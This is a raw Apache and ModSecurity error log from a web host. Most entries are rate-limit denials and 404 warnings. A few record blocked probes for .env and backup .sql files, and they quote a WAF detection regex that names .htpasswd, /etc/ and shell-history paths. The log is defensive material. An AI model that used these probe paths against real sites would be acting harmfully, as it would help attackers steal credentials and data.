[Tue May 26 19:53:43.922924 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs71ZMwN0DpLVWo6KscAAAAKU
[Tue May 26 19:53:43.924952 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs70qK9k_ZUB2Vp25EdAAAAdg
[Tue May 26 19:53:43.926186 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs72DRMqfxdEDkoszK4QAAAEw
[Tue May 26 19:53:43.926638 2026] [qos:error] [pid 93868:tid 94329] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs70qK9k_ZUB2Vp25EdQAAAdY
[Tue May 26 19:53:43.926778 2026] [qos:error] [pid 93868:tid 94336] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs70qK9k_ZUB2Vp25EeQAAAd0
[Tue May 26 19:53:43.927372 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs70qK9k_ZUB2Vp25EdgAAAdw
[Tue May 26 19:53:44.008126 2026] [security2:error] [pid 86490:tid 86626] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/monerod/.env"] [unique_id "ahWs8FZMwN0DpLVWo6KsdQAAAIs"]
[Tue May 26 19:53:44.168833 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsdwAAAN0
[Tue May 26 19:53:44.169315 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8GDRMqfxdEDkoszK4wAAACY
[Tue May 26 19:53:44.169726 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KseAAAAOs
[Tue May 26 19:53:44.170332 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8GDRMqfxdEDkoszK5AAAAB8
[Tue May 26 19:53:44.173686 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsewAAAK4
[Tue May 26 19:53:44.176090 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsfQAAAMw
[Tue May 26 19:53:44.178534 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsfgAAAPQ
[Tue May 26 19:53:44.180537 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsfwAAAIs
[Tue May 26 19:53:44.181210 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs8GDRMqfxdEDkoszK5QAAAH8
[Tue May 26 19:53:44.181929 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsgAAAANo
[Tue May 26 19:53:44.182003 2026] [qos:error] [pid 93867:tid 94188] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs8JCDfrjqoHpuuBKq-AAAAW0
[Tue May 26 19:53:44.300610 2026] [security2:error] [pid 86490:tid 86693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrxAAAAM4"]
[Tue May 26 19:53:44.300999 2026] [security2:error] [pid 93867:tid 94057] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7pCDfrjqoHpuuBKq2AAAATE"]
[Tue May 26 19:53:44.310304 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrsgAAAOU"]
[Tue May 26 19:53:44.311044 2026] [security2:error] [pid 93867:tid 94070] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7pCDfrjqoHpuuBKq3QAAATc"]
[Tue May 26 19:53:44.318701 2026] [security2:error] [pid 93867:tid 94093] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7pCDfrjqoHpuuBKq3wAAAUI"]
[Tue May 26 19:53:44.326437 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrwwAAALs"]
[Tue May 26 19:53:44.329918 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKwQAAAEs"]
[Tue May 26 19:53:44.332796 2026] [security2:error] [pid 86490:tid 86700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrsQAAANU"]
[Tue May 26 19:53:44.332918 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7mDRMqfxdEDkoszKwAAAAD0"]
[Tue May 26 19:53:44.338947 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrxwAAAN4"]
[Tue May 26 19:53:44.339821 2026] [security2:error] [pid 86490:tid 86681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrzAAAAMI"]
[Tue May 26 19:53:44.348986 2026] [security2:error] [pid 86490:tid 86640] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vendors/.env"] [unique_id "ahWs8FZMwN0DpLVWo6KshAAAAJk"]
[Tue May 26 19:53:44.371329 2026] [security2:error] [pid 86490:tid 86667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrngAAALQ"]
[Tue May 26 19:53:44.373047 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7lZMwN0DpLVWo6KrxQAAAMU"]
[Tue May 26 19:53:44.375009 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsEAAAAKw"]
[Tue May 26 19:53:44.377365 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsJAAAAOw"]
[Tue May 26 19:53:44.381288 2026] [security2:error] [pid 86490:tid 86672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsLwAAALk"]
[Tue May 26 19:53:44.382168 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsUQAAAJg"]
[Tue May 26 19:53:44.388762 2026] [security2:error] [pid 93867:tid 94087] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq5gAAAT8"]
[Tue May 26 19:53:44.390152 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsIgAAAIw"]
[Tue May 26 19:53:44.399289 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsSAAAALE"]
[Tue May 26 19:53:44.403437 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsXAAAALg"]
[Tue May 26 19:53:44.411773 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsIwAAAQI"]
[Tue May 26 19:53:44.424009 2026] [security2:error] [pid 93867:tid 94127] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq5wAAAVI"]
[Tue May 26 19:53:44.426216 2026] [security2:error] [pid 86490:tid 86650] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsMQAAAKM"]
[Tue May 26 19:53:44.431128 2026] [security2:error] [pid 93867:tid 94131] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq6QAAAVQ"]
[Tue May 26 19:53:44.438752 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsQwAAAPY"]
[Tue May 26 19:53:44.439285 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs72DRMqfxdEDkoszKzwAAAB0"]
[Tue May 26 19:53:44.441038 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsWAAAAQQ"]
[Tue May 26 19:53:44.441945 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs70qK9k_ZUB2Vp25EbQAAAcs"]
[Tue May 26 19:53:44.447975 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsTAAAANE"]
[Tue May 26 19:53:44.453022 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsMgAAAPU"]
[Tue May 26 19:53:44.461841 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsVgAAALU"]
[Tue May 26 19:53:44.573593 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8GDRMqfxdEDkoszK8QAAAHs
[Tue May 26 19:53:44.579464 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KswgAAAME
[Tue May 26 19:53:44.583095 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KswwAAAPY
[Tue May 26 19:53:44.593403 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsxAAAAIs
[Tue May 26 19:53:44.596509 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsxQAAAQQ
[Tue May 26 19:53:44.600448 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsxgAAAMI
[Tue May 26 19:53:44.601832 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsxwAAAMQ
[Tue May 26 19:53:44.604742 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsyAAAAJc
[Tue May 26 19:53:44.606367 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KsygAAAQE
[Tue May 26 19:53:44.616828 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KszAAAAPo
[Tue May 26 19:53:44.724459 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8GDRMqfxdEDkoszK8gAAADg
[Tue May 26 19:53:44.733939 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KszgAAAOk
[Tue May 26 19:53:44.738231 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6KszwAAAPU
[Tue May 26 19:53:44.743909 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6Ks0AAAALk
[Tue May 26 19:53:44.749835 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6Ks0QAAAI0
[Tue May 26 19:53:44.750683 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6Ks0gAAAIk
[Tue May 26 19:53:44.753443 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6Ks0wAAAKc
[Tue May 26 19:53:44.756716 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6Ks1AAAAKU
[Tue May 26 19:53:44.761938 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8FZMwN0DpLVWo6Ks1QAAALI
[Tue May 26 19:53:45.197789 2026] [security2:error] [pid 93868:tid 94289] [client 188.130.142.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWs8UqK9k_ZUB2Vp25EjAAAAa4"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1419175&moderation-hash=d9f3fb5fcb267946fa37c8a5a2f49535
[Tue May 26 19:53:45.200010 2026] [security2:error] [pid 86490:tid 86632] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/index.sql"] [unique_id "ahWs8VZMwN0DpLVWo6Ks5gAAAJE"]
[Tue May 26 19:53:45.279094 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs70qK9k_ZUB2Vp25EbgAAAcw"]
[Tue May 26 19:53:45.286798 2026] [security2:error] [pid 93867:tid 94138] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq7QAAAVc"]
[Tue May 26 19:53:45.289482 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs70qK9k_ZUB2Vp25EbwAAAc8"]
[Tue May 26 19:53:45.294567 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsYwAAAJQ"]
[Tue May 26 19:53:45.302238 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs72DRMqfxdEDkoszK2QAAAEQ"]
[Tue May 26 19:53:45.306397 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs72DRMqfxdEDkoszK1wAAAB4"]
[Tue May 26 19:53:45.311780 2026] [security2:error] [pid 93867:tid 94122] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq7gAAAVA"]
[Tue May 26 19:53:45.332526 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs71ZMwN0DpLVWo6KsaQAAAL8"]
[Tue May 26 19:53:45.334743 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs72DRMqfxdEDkoszK3wAAAHc"]
[Tue May 26 19:53:45.338250 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs72DRMqfxdEDkoszK2AAAAH0"]
[Tue May 26 19:53:45.350551 2026] [security2:error] [pid 93867:tid 94135] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq7AAAAVY"]
